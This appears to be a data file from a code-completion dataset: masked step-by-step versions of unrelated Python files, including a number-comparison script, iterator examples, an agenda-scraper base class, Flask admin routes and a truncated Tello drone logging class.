"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(1, count + 1):
something = '='
num1, num2 = map(int, input().split())
if num1 > num2:
something = '>'
elif num1 < num2:
something = '<'
print(f'#{i} {something}')
<|reserved_special_token_1|>
count = int(input())
for i in range(1, count + 1):
something = '='
num1, num2 = map(int, input().split())
if num1 > num2:
something = '>'
elif num1 < num2:
something = '<'
print(f'#{i} {something}')
|
flexible
|
{
"blob_id": "abcefa0a3312e158517ec8a15421d1d07220da6a",
"index": 5271,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(1, count + 1):\n something = '='\n num1, num2 = map(int, input().split())\n if num1 > num2:\n something = '>'\n elif num1 < num2:\n something = '<'\n print(f'#{i} {something}')\n",
"step-3": "count = int(input())\nfor i in range(1, count + 1):\n something = '='\n num1, num2 = map(int, input().split())\n if num1 > num2:\n something = '>'\n elif num1 < num2:\n something = '<'\n print(f'#{i} {something}')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import random
a = random.sample(range(100), 10)
print("All items: {}".format(a))
it = iter(a) # call a.__iter__()
print("Num01: {}".format(next(it))) # call it.__next__()
print("Num02: {}".format(next(it)))
print("Num03: {}".format(it.__next__()))
it = iter(a)
i = 1
while True:
try:
x = next(it)
print("Num{:02d}: {}".format(i, x))
except StopIteration:
break
i += 1
class Node():
def __init__(self, value):
self._value = value
self._children = []
def __repr__(self):
return 'Node({!r})'.format(self._value)
def add_child(self, node):
self._children.append(node)
def __iter__(self):
return iter(self._children)
root = Node(0)
root.add_child(Node(1))
root.add_child(Node(2))
for x in root:
print(x)
class Node2():
def __init__(self, value):
self._value = value
self._children = []
self._idx = 0
def __repr__(self):
return 'Node2({!r})'.format(self._value)
def add_child(self, node):
self._children.append(node)
def __iter__(self):
self._idx = 0
return self # 返回自己, 说明自己是迭代器,须实现__next__()
def __next__(self):
if self._idx < len(self._children):
idx = self._idx
self._idx += 1
return self._children[idx]
raise StopIteration
root = Node2(10)
root.add_child(Node2(11))
root.add_child(Node2(22))
for x in root:
print(x)
class Node3():
def __init__(self, value):
self._value = value
self._children = []
self._idx = 0
def __repr__(self):
return 'Node3({!r})'.format(self._value)
def add_child(self, node):
self._children.append(node)
def has_children(self):
return len(self._children) != 0
def __iter__(self):
self._idx = 0
return self # 返回自己, 说明自己是迭代器,须实现__next__()
def __next__(self):
if self._idx < len(self._children):
idx = self._idx
self._idx += 1
return self._children[idx]
raise StopIteration
def recur_show(root):
print(root)
if root.has_children():
for node in root:
recur_show(node)
def recur_show2(root):
if root.has_children():
for node in root:
recur_show2(node)
print(root)
# 0
#
# 10 20 30
#
# 11 12 31
root = Node3(0)
c1 = Node3(10)
c2 = Node3(20)
c3 = Node3(30)
c11 = Node3(11)
c12 = Node3(12)
c31 = Node3(31)
root.add_child(c1)
root.add_child(c2)
root.add_child(c3)
c1.add_child(c11)
c1.add_child(c12)
c3.add_child(c31)
print("==================")
recur_show(root)
print("==================")
recur_show2(root)
|
normal
|
{
"blob_id": "f5513bea4ca5f4c2ac80c4bf537a264a4052d1e9",
"index": 8866,
"step-1": "<mask token>\n\n\nclass Node2:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n <mask token>\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n\n\nclass Node3:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Node2:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n\n\nclass Node3:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass Node2:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n\n\nclass Node3:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Node:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n\n def __repr__(self):\n return 'Node({!r})'.format(self._value)\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass Node2:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n\n\nclass Node3:\n\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport random\n\na = random.sample(range(100), 10)\nprint(\"All items: {}\".format(a))\n\nit = iter(a) # call a.__iter__()\n\nprint(\"Num01: {}\".format(next(it))) # call it.__next__()\nprint(\"Num02: {}\".format(next(it)))\nprint(\"Num03: {}\".format(it.__next__()))\n\nit = iter(a)\ni = 1\nwhile True:\n try:\n x = next(it)\n print(\"Num{:02d}: {}\".format(i, x))\n except StopIteration:\n break\n i += 1\n\n\nclass Node():\n def __init__(self, value):\n self._value = value\n self._children = []\n\n def __repr__(self):\n return 'Node({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n return iter(self._children)\n \nroot = Node(0)\nroot.add_child(Node(1))\nroot.add_child(Node(2))\n\nfor x in root:\n print(x)\n\nclass Node2():\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node2({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def __iter__(self):\n self._idx = 0\n return self # 返回自己, 说明自己是迭代器,须实现__next__()\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\nroot = Node2(10)\nroot.add_child(Node2(11))\nroot.add_child(Node2(22))\n\nfor x in root:\n print(x)\n\nclass Node3():\n def __init__(self, value):\n self._value = value\n self._children = []\n self._idx = 0\n\n def __repr__(self):\n return 'Node3({!r})'.format(self._value)\n\n def add_child(self, node):\n self._children.append(node)\n\n def has_children(self):\n return len(self._children) != 0\n\n def __iter__(self):\n self._idx = 0\n return self # 返回自己, 说明自己是迭代器,须实现__next__()\n\n def __next__(self):\n if self._idx < len(self._children):\n idx = self._idx\n self._idx += 1\n return self._children[idx]\n raise StopIteration\n\ndef recur_show(root):\n print(root)\n if root.has_children():\n for node in root:\n recur_show(node)\n\ndef recur_show2(root):\n if root.has_children():\n for node in root:\n recur_show2(node)\n print(root)\n\n# 0\n# \n# 10 20 30\n# \n# 11 12 31\n\nroot = Node3(0)\nc1 = Node3(10)\nc2 = Node3(20)\nc3 = Node3(30)\nc11 = Node3(11)\nc12 = Node3(12)\nc31 = Node3(31)\nroot.add_child(c1)\nroot.add_child(c2)\nroot.add_child(c3)\nc1.add_child(c11)\nc1.add_child(c12)\nc3.add_child(c31)\n\nprint(\"==================\")\nrecur_show(root)\nprint(\"==================\")\nrecur_show2(root)\n",
"step-ids": [
12,
13,
15,
16,
24
]
}
|
[
12,
13,
15,
16,
24
] |
<|reserved_special_token_0|>
class EngageScraper(ABC):
def __init__(self, tz_string):
super().__init__()
self._agenda_locations = []
self._tz = timezone(tz_string)
@property
def agenda_locations(self):
return self._agenda_locations
@agenda_locations.setter
def agenda_locations(self, locations):
self._agenda_locations = locations
@abstractmethod
def get_available_agendas(self):
"""
Method to determine what agendas are available.
Sets the self._agenda_locations property
In a typical HTML scraper, these resources would be HTTP URLs
"""
pass
<|reserved_special_token_0|>
@abstractmethod
def _process_agenda(self, agenda_data, meeting_id):
"""
process_agenda takes one agenda document (for instance HTML document) data.
A processed agenda will have to process each of its items. Each agenda item might
be at a different location or contained within an agenda. If they are contained within
the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be
called with the location of the agenda_item.
The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items
"""
pass
@abstractmethod
def _scrape_agenda_item(self, agenda_item_location):
"""
Takes a location and produces the data from the item and calls process_agenda_item
"""
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@abstractmethod
def _store_agenda_items(self, agenda_dict, agenda_saved):
"""
Calls to the DB should be here for agenda item content
"""
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EngageScraper(ABC):
def __init__(self, tz_string):
super().__init__()
self._agenda_locations = []
self._tz = timezone(tz_string)
@property
def agenda_locations(self):
return self._agenda_locations
@agenda_locations.setter
def agenda_locations(self, locations):
self._agenda_locations = locations
@abstractmethod
def get_available_agendas(self):
"""
Method to determine what agendas are available.
Sets the self._agenda_locations property
In a typical HTML scraper, these resources would be HTTP URLs
"""
pass
@abstractmethod
def scrape(self):
"""
Scrape processes all agendas in self._agenda_locations
It calls process agenda on all items in _agenda_locations with
data downloaded from those locations.
The result of scrape is the stored agendas and agenda items.
"""
pass
@abstractmethod
def _process_agenda(self, agenda_data, meeting_id):
"""
process_agenda takes one agenda document (for instance HTML document) data.
A processed agenda will have to process each of its items. Each agenda item might
be at a different location or contained within an agenda. If they are contained within
the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be
called with the location of the agenda_item.
The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items
"""
pass
@abstractmethod
def _scrape_agenda_item(self, agenda_item_location):
"""
Takes a location and produces the data from the item and calls process_agenda_item
"""
pass
@abstractmethod
def _process_agenda_item(self, agenda_item_data, agenda_item_id,
meeting_id, meeting_time):
"""
The result of process agenda item will be a dict that can be stored by store_agenda_item
"""
pass
<|reserved_special_token_0|>
@abstractmethod
def _store_agenda_items(self, agenda_dict, agenda_saved):
"""
Calls to the DB should be here for agenda item content
"""
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EngageScraper(ABC):
def __init__(self, tz_string):
super().__init__()
self._agenda_locations = []
self._tz = timezone(tz_string)
@property
def agenda_locations(self):
return self._agenda_locations
@agenda_locations.setter
def agenda_locations(self, locations):
self._agenda_locations = locations
@abstractmethod
def get_available_agendas(self):
"""
Method to determine what agendas are available.
Sets the self._agenda_locations property
In a typical HTML scraper, these resources would be HTTP URLs
"""
pass
@abstractmethod
def scrape(self):
"""
Scrape processes all agendas in self._agenda_locations
It calls process agenda on all items in _agenda_locations with
data downloaded from those locations.
The result of scrape is the stored agendas and agenda items.
"""
pass
@abstractmethod
def _process_agenda(self, agenda_data, meeting_id):
"""
process_agenda takes one agenda document (for instance HTML document) data.
A processed agenda will have to process each of its items. Each agenda item might
be at a different location or contained within an agenda. If they are contained within
the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be
called with the location of the agenda_item.
The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items
"""
pass
@abstractmethod
def _scrape_agenda_item(self, agenda_item_location):
"""
Takes a location and produces the data from the item and calls process_agenda_item
"""
pass
@abstractmethod
def _process_agenda_item(self, agenda_item_data, agenda_item_id,
meeting_id, meeting_time):
"""
The result of process agenda item will be a dict that can be stored by store_agenda_item
"""
pass
@abstractmethod
def _store_agenda(self, processed_agenda, committee):
"""
Calls to DB should be here for the main agenda content
"""
pass
@abstractmethod
def _store_agenda_items(self, agenda_dict, agenda_saved):
"""
Calls to the DB should be here for agenda item content
"""
pass
<|reserved_special_token_1|>
from abc import ABC, abstractmethod, abstractproperty
from pytz import timezone
class EngageScraper(ABC):
def __init__(self, tz_string):
super().__init__()
self._agenda_locations = []
self._tz = timezone(tz_string)
@property
def agenda_locations(self):
return self._agenda_locations
@agenda_locations.setter
def agenda_locations(self, locations):
self._agenda_locations = locations
@abstractmethod
def get_available_agendas(self):
"""
Method to determine what agendas are available.
Sets the self._agenda_locations property
In a typical HTML scraper, these resources would be HTTP URLs
"""
pass
@abstractmethod
def scrape(self):
"""
Scrape processes all agendas in self._agenda_locations
It calls process agenda on all items in _agenda_locations with
data downloaded from those locations.
The result of scrape is the stored agendas and agenda items.
"""
pass
@abstractmethod
def _process_agenda(self, agenda_data, meeting_id):
"""
process_agenda takes one agenda document (for instance HTML document) data.
A processed agenda will have to process each of its items. Each agenda item might
be at a different location or contained within an agenda. If they are contained within
the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be
called with the location of the agenda_item.
The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items
"""
pass
@abstractmethod
def _scrape_agenda_item(self, agenda_item_location):
"""
Takes a location and produces the data from the item and calls process_agenda_item
"""
pass
@abstractmethod
def _process_agenda_item(self, agenda_item_data, agenda_item_id,
meeting_id, meeting_time):
"""
The result of process agenda item will be a dict that can be stored by store_agenda_item
"""
pass
@abstractmethod
def _store_agenda(self, processed_agenda, committee):
"""
Calls to DB should be here for the main agenda content
"""
pass
@abstractmethod
def _store_agenda_items(self, agenda_dict, agenda_saved):
"""
Calls to the DB should be here for agenda item content
"""
pass
|
flexible
|
{
"blob_id": "ec224924206c41cf8203c6aa8002ddf6b0e70e9b",
"index": 1116,
"step-1": "<mask token>\n\n\nclass EngageScraper(ABC):\n\n def __init__(self, tz_string):\n super().__init__()\n self._agenda_locations = []\n self._tz = timezone(tz_string)\n\n @property\n def agenda_locations(self):\n return self._agenda_locations\n\n @agenda_locations.setter\n def agenda_locations(self, locations):\n self._agenda_locations = locations\n\n @abstractmethod\n def get_available_agendas(self):\n \"\"\"\n Method to determine what agendas are available.\n Sets the self._agenda_locations property\n In a typical HTML scraper, these resources would be HTTP URLs\n \"\"\"\n pass\n <mask token>\n\n @abstractmethod\n def _process_agenda(self, agenda_data, meeting_id):\n \"\"\"\n process_agenda takes one agenda document (for instance HTML document) data.\n A processed agenda will have to process each of its items. Each agenda item might\n be at a different location or contained within an agenda. If they are contained within\n the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be\n called with the location of the agenda_item.\n The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items\n \"\"\"\n pass\n\n @abstractmethod\n def _scrape_agenda_item(self, agenda_item_location):\n \"\"\"\n Takes a location and produces the data from the item and calls process_agenda_item\n \"\"\"\n pass\n <mask token>\n <mask token>\n\n @abstractmethod\n def _store_agenda_items(self, agenda_dict, agenda_saved):\n \"\"\"\n Calls to the DB should be here for agenda item content\n \"\"\"\n pass\n",
"step-2": "<mask token>\n\n\nclass EngageScraper(ABC):\n\n def __init__(self, tz_string):\n super().__init__()\n self._agenda_locations = []\n self._tz = timezone(tz_string)\n\n @property\n def agenda_locations(self):\n return self._agenda_locations\n\n @agenda_locations.setter\n def agenda_locations(self, locations):\n self._agenda_locations = locations\n\n @abstractmethod\n def get_available_agendas(self):\n \"\"\"\n Method to determine what agendas are available.\n Sets the self._agenda_locations property\n In a typical HTML scraper, these resources would be HTTP URLs\n \"\"\"\n pass\n\n @abstractmethod\n def scrape(self):\n \"\"\"\n Scrape processes all agendas in self._agenda_locations\n It calls process agenda on all items in _agenda_locations with \n data downloaded from those locations.\n The result of scrape is the stored agendas and agenda items.\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda(self, agenda_data, meeting_id):\n \"\"\"\n process_agenda takes one agenda document (for instance HTML document) data.\n A processed agenda will have to process each of its items. Each agenda item might\n be at a different location or contained within an agenda. If they are contained within\n the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be\n called with the location of the agenda_item.\n The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items\n \"\"\"\n pass\n\n @abstractmethod\n def _scrape_agenda_item(self, agenda_item_location):\n \"\"\"\n Takes a location and produces the data from the item and calls process_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda_item(self, agenda_item_data, agenda_item_id,\n meeting_id, meeting_time):\n \"\"\"\n The result of process agenda item will be a dict that can be stored by store_agenda_item\n \"\"\"\n pass\n <mask token>\n\n @abstractmethod\n def _store_agenda_items(self, agenda_dict, agenda_saved):\n \"\"\"\n Calls to the DB should be here for agenda item content\n \"\"\"\n pass\n",
"step-3": "<mask token>\n\n\nclass EngageScraper(ABC):\n\n def __init__(self, tz_string):\n super().__init__()\n self._agenda_locations = []\n self._tz = timezone(tz_string)\n\n @property\n def agenda_locations(self):\n return self._agenda_locations\n\n @agenda_locations.setter\n def agenda_locations(self, locations):\n self._agenda_locations = locations\n\n @abstractmethod\n def get_available_agendas(self):\n \"\"\"\n Method to determine what agendas are available.\n Sets the self._agenda_locations property\n In a typical HTML scraper, these resources would be HTTP URLs\n \"\"\"\n pass\n\n @abstractmethod\n def scrape(self):\n \"\"\"\n Scrape processes all agendas in self._agenda_locations\n It calls process agenda on all items in _agenda_locations with \n data downloaded from those locations.\n The result of scrape is the stored agendas and agenda items.\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda(self, agenda_data, meeting_id):\n \"\"\"\n process_agenda takes one agenda document (for instance HTML document) data.\n A processed agenda will have to process each of its items. Each agenda item might\n be at a different location or contained within an agenda. If they are contained within\n the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be\n called with the location of the agenda_item.\n The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items\n \"\"\"\n pass\n\n @abstractmethod\n def _scrape_agenda_item(self, agenda_item_location):\n \"\"\"\n Takes a location and produces the data from the item and calls process_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda_item(self, agenda_item_data, agenda_item_id,\n meeting_id, meeting_time):\n \"\"\"\n The result of process agenda item will be a dict that can be stored by store_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _store_agenda(self, processed_agenda, committee):\n \"\"\"\n Calls to DB should be here for the main agenda content\n \"\"\"\n pass\n\n @abstractmethod\n def _store_agenda_items(self, agenda_dict, agenda_saved):\n \"\"\"\n Calls to the DB should be here for agenda item content\n \"\"\"\n pass\n",
"step-4": "from abc import ABC, abstractmethod, abstractproperty\nfrom pytz import timezone\n\n\nclass EngageScraper(ABC):\n\n def __init__(self, tz_string):\n super().__init__()\n self._agenda_locations = []\n self._tz = timezone(tz_string)\n\n @property\n def agenda_locations(self):\n return self._agenda_locations\n\n @agenda_locations.setter\n def agenda_locations(self, locations):\n self._agenda_locations = locations\n\n @abstractmethod\n def get_available_agendas(self):\n \"\"\"\n Method to determine what agendas are available.\n Sets the self._agenda_locations property\n In a typical HTML scraper, these resources would be HTTP URLs\n \"\"\"\n pass\n\n @abstractmethod\n def scrape(self):\n \"\"\"\n Scrape processes all agendas in self._agenda_locations\n It calls process agenda on all items in _agenda_locations with \n data downloaded from those locations.\n The result of scrape is the stored agendas and agenda items.\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda(self, agenda_data, meeting_id):\n \"\"\"\n process_agenda takes one agenda document (for instance HTML document) data.\n A processed agenda will have to process each of its items. Each agenda item might\n be at a different location or contained within an agenda. If they are contained within\n the agenda, progress to process_agenda_item with its data. If not, scrape_agenda_item should be\n called with the location of the agenda_item.\n The result of process agenda will be a dict that can be saved by store_agenda and store_agenda_items\n \"\"\"\n pass\n\n @abstractmethod\n def _scrape_agenda_item(self, agenda_item_location):\n \"\"\"\n Takes a location and produces the data from the item and calls process_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _process_agenda_item(self, agenda_item_data, agenda_item_id,\n meeting_id, meeting_time):\n \"\"\"\n The result of process agenda item will be a dict that can be stored by store_agenda_item\n \"\"\"\n pass\n\n @abstractmethod\n def _store_agenda(self, processed_agenda, committee):\n \"\"\"\n Calls to DB should be here for the main agenda content\n \"\"\"\n pass\n\n @abstractmethod\n def _store_agenda_items(self, agenda_dict, agenda_saved):\n \"\"\"\n Calls to the DB should be here for agenda item content\n \"\"\"\n pass\n",
"step-5": null,
"step-ids": [
8,
10,
11,
12
]
}
|
[
8,
10,
11,
12
] |
# coding: utf-8
from flask import Blueprint, make_response, render_template, request
from flask_restful import Resource
from flask_security import login_required
from ..clients.service import list_clients
from ..roles.service import list_roles
from ...models import Client, Role
admin = Blueprint('admin', __name__, url_prefix='/passport/admin')
@admin.route('/', methods=['GET'])
@login_required
def index():
headers = {'Content-Type': 'text/html'}
return make_response(render_template(
'index.html'), headers)
@admin.route('/clients/<client_id>', methods=['GET'])
@admin.route('/clients/new', methods=['GET'])
@admin.route('/clients', methods=['GET'])
@login_required
def clients(client_id=None):
headers = {'Content-Type': 'text/html'}
if request.path[-4:] == '/new':
clients = [Client()]
operation_type = 'new'
else:
clients = list_clients(client_id)
operation_type = 'list' if not client_id else 'edit'
return make_response(render_template(
'clients.html', clients=clients, operation_type=operation_type))
@admin.route('/roles/<role_id>', methods=['GET'])
@admin.route('/roles/new', methods=['GET'])
@admin.route('/roles', methods=['GET'])
@login_required
def roles(role_id=None, operation_type=None):
headers = {'Content-Type': 'text/html'}
if request.path[-4:] == '/new':
roles = [Role()]
operation_type = 'new'
if not operation_type:
roles = list_roles(role_id)
operation_type = 'list' if not role_id else 'edit'
return make_response(render_template(
'roles.html', roles=roles, operation_type=operation_type))
|
normal
|
{
"blob_id": "f5f1a4db33cea8421cb4236606dfb288efee7621",
"index": 2142,
"step-1": "<mask token>\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('index.html'), headers)\n\n\n<mask token>\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n return make_response(render_template('roles.html', roles=roles,\n operation_type=operation_type))\n",
"step-2": "<mask token>\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('index.html'), headers)\n\n\n@admin.route('/clients/<client_id>', methods=['GET'])\n@admin.route('/clients/new', methods=['GET'])\n@admin.route('/clients', methods=['GET'])\n@login_required\ndef clients(client_id=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n clients = [Client()]\n operation_type = 'new'\n else:\n clients = list_clients(client_id)\n operation_type = 'list' if not client_id else 'edit'\n return make_response(render_template('clients.html', clients=clients,\n operation_type=operation_type))\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n return make_response(render_template('roles.html', roles=roles,\n operation_type=operation_type))\n",
"step-3": "<mask token>\nadmin = Blueprint('admin', __name__, url_prefix='/passport/admin')\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('index.html'), headers)\n\n\n@admin.route('/clients/<client_id>', methods=['GET'])\n@admin.route('/clients/new', methods=['GET'])\n@admin.route('/clients', methods=['GET'])\n@login_required\ndef clients(client_id=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n clients = [Client()]\n operation_type = 'new'\n else:\n clients = list_clients(client_id)\n operation_type = 'list' if not client_id else 'edit'\n return make_response(render_template('clients.html', clients=clients,\n operation_type=operation_type))\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n return make_response(render_template('roles.html', roles=roles,\n operation_type=operation_type))\n",
"step-4": "from flask import Blueprint, make_response, render_template, request\nfrom flask_restful import Resource\nfrom flask_security import login_required\nfrom ..clients.service import list_clients\nfrom ..roles.service import list_roles\nfrom ...models import Client, Role\nadmin = Blueprint('admin', __name__, url_prefix='/passport/admin')\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template('index.html'), headers)\n\n\n@admin.route('/clients/<client_id>', methods=['GET'])\n@admin.route('/clients/new', methods=['GET'])\n@admin.route('/clients', methods=['GET'])\n@login_required\ndef clients(client_id=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n clients = [Client()]\n operation_type = 'new'\n else:\n clients = list_clients(client_id)\n operation_type = 'list' if not client_id else 'edit'\n return make_response(render_template('clients.html', clients=clients,\n operation_type=operation_type))\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n return make_response(render_template('roles.html', roles=roles,\n operation_type=operation_type))\n",
"step-5": "# coding: utf-8\nfrom flask import Blueprint, make_response, render_template, request\nfrom flask_restful import Resource\nfrom flask_security import login_required\n\nfrom ..clients.service import list_clients\nfrom ..roles.service import list_roles\nfrom ...models import Client, Role\n\n\nadmin = Blueprint('admin', __name__, url_prefix='/passport/admin')\n\n\n@admin.route('/', methods=['GET'])\n@login_required\ndef index():\n headers = {'Content-Type': 'text/html'}\n return make_response(render_template(\n 'index.html'), headers)\n\n\n@admin.route('/clients/<client_id>', methods=['GET'])\n@admin.route('/clients/new', methods=['GET'])\n@admin.route('/clients', methods=['GET'])\n@login_required\ndef clients(client_id=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n clients = [Client()]\n operation_type = 'new'\n else:\n clients = list_clients(client_id)\n operation_type = 'list' if not client_id else 'edit'\n\n return make_response(render_template(\n 'clients.html', clients=clients, operation_type=operation_type))\n\n\n@admin.route('/roles/<role_id>', methods=['GET'])\n@admin.route('/roles/new', methods=['GET'])\n@admin.route('/roles', methods=['GET'])\n@login_required\ndef roles(role_id=None, operation_type=None):\n headers = {'Content-Type': 'text/html'}\n if request.path[-4:] == '/new':\n roles = [Role()]\n operation_type = 'new'\n if not operation_type:\n roles = list_roles(role_id)\n operation_type = 'list' if not role_id else 'edit'\n\n return make_response(render_template(\n 'roles.html', roles=roles, operation_type=operation_type))\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class DataTello:
def __init__(self):
self.tello = Tello()
self.__data = []
self.__array = []
self.tempoVoo = 420000
"""
___Padrão para nome dos arquivos das tabelas___
Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo
1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv
2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv
3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv
"""
self.nomeArquivo = '2_tudoFechado_420'
self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',
